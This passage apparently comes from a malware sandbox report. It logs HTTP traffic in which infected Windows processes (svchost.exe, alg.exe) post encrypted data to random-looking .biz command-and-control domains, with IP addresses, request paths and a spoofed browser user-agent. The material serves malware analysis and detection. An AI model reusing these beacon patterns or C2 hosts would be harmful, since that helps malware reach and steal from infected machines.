                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.500425100 CEST778OUTData Raw: 2d 24 ba 37 f9 37 5c f9 fe 02 00 00 ec a9 09 10 34 ec f9 d3 24 f5 0d 2d c9 f1 8e d5 e7 33 ef be 60 e2 64 d6 ac 30 6b 4e 2f 18 f8 19 8e 0b 6d dd 86 ae 73 2f 6e b5 74 84 92 b3 74 f5 b9 cb b3 85 7e 5c 74 aa 74 8b 28 85 14 4d 0e f4 50 bb d0 fb 98 23
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: -$77\4$-3`d0kN/ms/ntt~\tt(MP#2bH4CCDI~4*\1N#}[b6y O8<+]h%5C3z(8Pw]V"j <s_k6?5cVhn G1Ad [&PD
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.968970060 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=e298ebc88f1160a91a37d81a44e386e5|8.46.123.33|1728394176|1728394176|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              129192.168.2.4501713.254.94.185804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634922028 CEST355OUTPOST /ldybnpdmgmce HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:36.634922028 CEST786OUTData Raw: 87 14 21 cf 75 e5 1f c2 06 03 00 00 85 2c 1b 04 70 2d a3 63 34 d4 35 6d 49 44 e4 24 88 c2 e7 37 48 35 c2 da dc b9 a7 ed bc 0a ef 09 b0 fd 61 0a 9d 03 34 90 a0 53 26 2c 05 0b b7 05 e5 db 51 de 86 e8 21 33 8f b5 1e 7d db a2 08 33 77 64 a4 41 a7 a5
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !u,p-c45mID$7H5a4S&,Q!3}3wdAm( m;&e}T51JJYM{}:4u+d96I@bx)z$.@T/B^rIy|ljryyc
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.387723923 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=326dadc042134eb79c15014326b6c378|8.46.123.33|1728394177|1728394177|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              130192.168.2.45017254.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.535588980 CEST345OUTPOST /pkyl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.535588980 CEST786OUTData Raw: 2f be cd 1e 9e f7 d1 45 06 03 00 00 0d e8 17 84 92 9c ab 76 58 d0 87 7c 84 08 3e b9 9d 21 2c 78 aa 0f f1 da cb 3f 40 f8 78 11 33 bb 6e 36 b7 16 71 9a 81 dc d5 c0 e2 99 30 99 a3 2c 95 a4 47 11 8a 8c d8 af d6 5d 47 46 05 fd 74 99 86 85 a2 09 7a 6e
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /EvX|>!,x?@x3n6q0,G]GFtznKS1w@_Q$Y c<",s|Mp01B9yuv$^5gZtWrU$%T[";br[m;Za*lKqya.y5
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.256568909 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a49248caf519acf7da02fe108742f703|8.46.123.33|1728394178|1728394178|0|1|0; path=/; domain=.ywffr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              131192.168.2.45017354.244.188.177802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.747864962 CEST347OUTPOST /scdrs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:37.748222113 CEST778OUTData Raw: 6a 00 7d bc 8b 6e 01 fe fe 02 00 00 9c 85 c8 02 c9 3a 46 40 79 fc 67 83 c9 36 03 cd fa 09 54 f3 78 99 48 9c 1f a7 f8 20 64 f1 7f 4a 81 60 1b 76 33 71 b1 81 1d dd 6a 0b dd de a2 8b 4b 74 c7 82 dd a2 96 a9 d3 2e 1f d1 32 b3 e8 55 c5 76 b1 85 03 c4
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: j}n:F@yg6TxH dJ`v3qjKt.2Uv9Z4Z&%s?DT|'`,aV!<[jn.!|zPBBG;%yO6{~;QV:@*}t&Lt%LZmzUm8r0l`s.C
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.497769117 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=633edb470f550ddaacab05a02ead4208|8.46.123.33|1728394178|1728394178|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              132192.168.2.45017454.244.188.177804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.284884930 CEST351OUTPOST /yefflviaj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.284914017 CEST786OUTData Raw: 8e ec 2f c2 a4 17 a3 c2 06 03 00 00 e9 ef b8 13 ff ba 88 4a 0b 99 76 c7 af b8 e0 35 32 cf ac 15 a0 d6 f5 ae 0b 9c 79 95 35 fe 29 ab f3 35 66 5c 71 5b 00 66 31 56 41 46 5d c2 29 cd b9 f5 64 6d cb 6c 27 e7 92 8f 14 ec 39 c2 af ab 6c 59 4f ee 99 3a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /Jv52y5)5f\q[f1VAF])dml'9lYO:*$OmG53`xH@AGH3|4.P3AG8+5g@Z=!]:tHlL0FN$I^G\L`q\hns
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.019829035 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7bf9cbbd42b25c1f475f6b6f53114980|8.46.123.33|1728394178|1728394178|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              133192.168.2.4501763.254.94.185802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.950469971 CEST350OUTPOST /flkouthsl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:38.950508118 CEST778OUTData Raw: 0e 84 81 61 6c b9 39 71 fe 02 00 00 e2 8f 60 fd 3c ae e5 77 13 83 05 2e 3a 69 c4 35 4f a4 f0 82 da 55 18 4f df 63 93 d9 83 68 ba 9f b8 48 b4 0b 4d e6 40 06 89 4e e2 73 bd 61 14 93 b1 60 40 6f bd 75 4a c4 a1 42 22 32 9d 2d a4 9e d6 59 c1 84 c8 29
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: al9q`<w.:i5OUOchHM@Nsa`@ouJB"2-Y)%k~`yJkz8e^i>C_h`,edbK2sO6ea}pm/S1+pZCoJ!X3s&6N{\nKG}fW '+*p
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.688638926 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=3326eb2e443edd68b8f4374e7230ca57|8.46.123.33|1728394179|1728394179|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              134192.168.2.45017744.213.104.86804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.050441027 CEST356OUTPOST /pavcpmnglvwlhxt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.050468922 CEST786OUTData Raw: a7 42 6e df e3 41 94 41 06 03 00 00 5b cb ea 94 45 f0 b1 cb 09 01 6e ff ce 1c 65 40 da b6 00 f9 89 31 06 b4 91 99 b5 e8 80 ca 56 d0 de b7 03 c7 00 e9 c6 8b 63 0e 42 3e fe 34 2c ba 8b 97 6c 66 9a ec 7f df 1a 3a 07 f2 dc 6c 23 d9 9c d0 27 16 3e 65
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: BnAA[Ene@1VcB>4,lf:l#'>e?/wy>A,KE=Gy]e/$Mq".]lP?nNm8R\Gy<9vP7LzS8 38@vfP'
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.516978979 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ff4aeaff3e9544127923e2747ba4b45a|8.46.123.33|1728394179|1728394179|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              135192.168.2.45017818.208.156.248804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.615616083 CEST349OUTPOST /oedtv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:39.615653038 CEST786OUTData Raw: 67 1f b1 00 70 b4 22 5e 06 03 00 00 5d ec cb 2f f6 07 fe 83 8e 70 09 1f d1 6b 88 ed b7 c0 5b 7c 96 42 9d c0 8f 3d 7b e5 17 c9 c5 33 79 ad 26 e2 94 5d a9 96 51 f0 dc 32 6c 92 29 77 06 ad 5b e6 82 34 02 a8 85 09 b2 13 46 a7 58 35 d5 e2 b1 0a 4c 19
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gp"^]/pk[|B={3y&]Q2l)w[4FX5L]m6X`Pm<,~&*zVPhTa)yH`X'fYI(KMbf|e2^LUtBJri QAHn,VmpcF7+\@ r_
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.052479982 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=d200ff9587dae26559d1a9369374e9ac|8.46.123.33|1728394180|1728394180|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              136192.168.2.45017918.141.10.107802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.027127981 CEST355OUTPOST /ifmlpkcljjt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.027148008 CEST778OUTData Raw: 17 cd ff 5d 98 54 87 a8 fe 02 00 00 45 c3 7e 12 74 48 4d 12 62 46 04 e2 d8 fa 29 65 44 1d f4 03 42 93 41 20 81 f8 fc 29 0d cc 13 53 f5 07 8f c9 60 d2 49 dc 67 56 c5 91 d6 04 d8 44 98 d8 bc ba 1d 1a 50 54 15 73 aa 69 33 d0 e8 a9 19 c2 6c c5 d7 d5
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ]TE~tHMbF)eDBA )S`IgVDPTsi3lJj<r"i*SHaaQWvoRO*u`UFjUN3/^H>Qh]Bm398Rthlo%Nc%tj<$GAk+R=2wFJv@mC
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.381036043 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ba3f64e15547d914cf7fdac7a3ce3eb8|8.46.123.33|1728394181|1728394181|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              137192.168.2.45018044.221.84.105804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.099745035 CEST354OUTPOST /guxaecyjiiwu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.099756002 CEST786OUTData Raw: 2c 96 0b 84 c1 80 90 69 06 03 00 00 9e 5e 78 32 33 0d 78 34 98 1c 25 fd 05 01 d9 80 6c 40 1e f6 e0 e3 da 8d 53 f8 fe de a1 96 92 eb ae dd 6a 94 d2 fc a8 e2 a8 7f 80 30 64 b6 f5 4f 18 5f 85 2b a2 5a ff 12 30 ef cd ca 57 00 e9 00 65 eb 8b 7f 36 f1
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,i^x23x4%l@Sj0dO_+Z0We6]^,;C5ztTT/,C$dJOL:dPP1$#ZoU%aR/E_ >Ep[#gJL2wCq 99,hb
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.587872982 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ec6965203523b05088857c8c2a174420|8.46.123.33|1728394180|1728394180|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              138192.168.2.45018272.52.178.23804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:40.668971062 CEST347OUTPOST /noy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: wxgzshna.biz
